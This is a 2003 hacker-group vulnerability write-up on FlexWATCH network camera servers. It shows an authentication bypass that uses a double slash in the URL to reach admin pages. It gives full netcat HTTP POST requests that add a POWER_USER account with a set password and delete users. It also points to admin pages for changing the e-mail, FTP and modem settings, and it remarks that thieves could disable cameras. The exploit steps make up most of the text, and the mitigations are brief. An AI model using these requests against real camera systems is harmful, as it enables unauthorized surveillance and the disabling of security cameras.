------------------ u0xa ------------------------
Author: SLAIZER 
mail: slaizer[at]phreaker.net
	
Date: Sun/Oct/26/2003 

-------"Another way of seeing the things"--------
	         
-------------------------------------------------


	

	 Unauthorized access Vulnerability in FlexWATCH camera Server.
       -----------------------------------------------------------

Vendor:
-------
 
·SEYEON Technology
·FlexWATCH Network Video Server 
Url: http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr 


Product:
--------

All versions web based configuration utility.
I tested on SYS_MODEL = 132

FlexWATCH is a Camera Server entrusted to centralize for Web Administration .
It´s very frequently used by safety companies , banks , parks and comercial centres.




Description :
-------------

[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 0




*First:


 For default , you can read the source at index page and see that :
 
	 <!-- You can modify here for user information. -->
    	 <!-- ex) ID:guest, PASSWORD:guest              -->

 Many System Use this user and password , but that isn´t important .





 I found that  :
  
------------u0xa-----------

      }
    function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }
		
	function select_sample()


------------u0xa-----------


<This is a autentification-javascript>

Url: admin/aindex.htm is a web based configuration  .






*I read more source pages , and see :


-----------u0xa------------



<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>
    


-----------u0xa------------


ummMm I want read stream.jar :



[Necora@eviluser]$ jar xf stream.jar 
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class  <---- (C:
MIMEBase64.class <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class <----- For now any cgi-url
StrCan.class
StreamCgi.class <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-

·It´s enough to know how the system works , authoritation , cgi , crypt..



---------------------------




*Second seen http://victim/live.html

and find that :


------------u0xa------------


<script language = "JavaScript" src="sysinfo.js"></script>


------------u0xa------------




This contain info from the System :

//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";

//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";

//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;

var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";

var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;

-----------------------






*Some time ago , i read a Security Vulnerability  in Boa , how can obtain access in privileged directory with '//'

Example :


http://victim//privileged.html  <--- ok?





*The Access camera url :
------------------------


http://victim//app/sample/ab1.html 



Wow! first access granted ! , now you have got identify in java-application .
But... why to search more there? if we can play with administration´s site o web, let´s try
 



http://victim//admin/aindex.htm <---- Interesting.... 





Now it´s very easy  :D , 


·Add a User for view cameras :
------------------------------


 http://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>


[Necora@eviluser]$ nc victim 80


POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK

\n\n



**********************************************************************
-Wow! New user add : user= slaizer password= root123 group=POWER_USER*
**********************************************************************
*Note : Exist diferent Groups for add user : guest , User and Power_User  .
        At default only guest group can access remotely , you change this in :

	http://victim//admin/asp/chglimit.asp






·How to delete user :
------------------

 http://victim//admin/asp/deluser.asp


[Necora@eviluser]$nc victim 80

POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache



RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK

\n\n



**********************
-User slaizer deleted*
**********************


------------------------------------------------|
Now you have access to watch all cameras :-D !  |
Too you can reboot , edit configuration ...     |
						|
						|
      http://victim/app/sample/ab1.html		|	
						|
      -Login=slaizer password=root123-	        |	
________________________________________________|



Examples :


·Configure e-mail adrees for send config :

	http://victim//admin/fset/fset_email.htm



·Configure FTP for send a "evil-config" troyan-cgi/asp conf .. blah blah.
        
        http://victim//admin/fset/fset_ftp.htm



·Edit modem configuration for phreakers :)

	http://victim//admin/fset/fset_modem.htm



·CHange Camera Names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!

	http://victim//admin/aindex.htm



<Imagination , coffee and time.>






Possible solutions :
--------------------


·Activate the firewall to admit alone connections since the client that we want.

·Not to trust in the autentificacion on part of the client ( javascripts..)

·SEYEON invest in the safety ... a thief might use it to deactivate the cameras in a theft ... 




************************
Greetz! :

:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi 

:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::

				
For aLL : 
                  #boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\

************************

*******************************
*Sorry for orthographic errors*
*******************************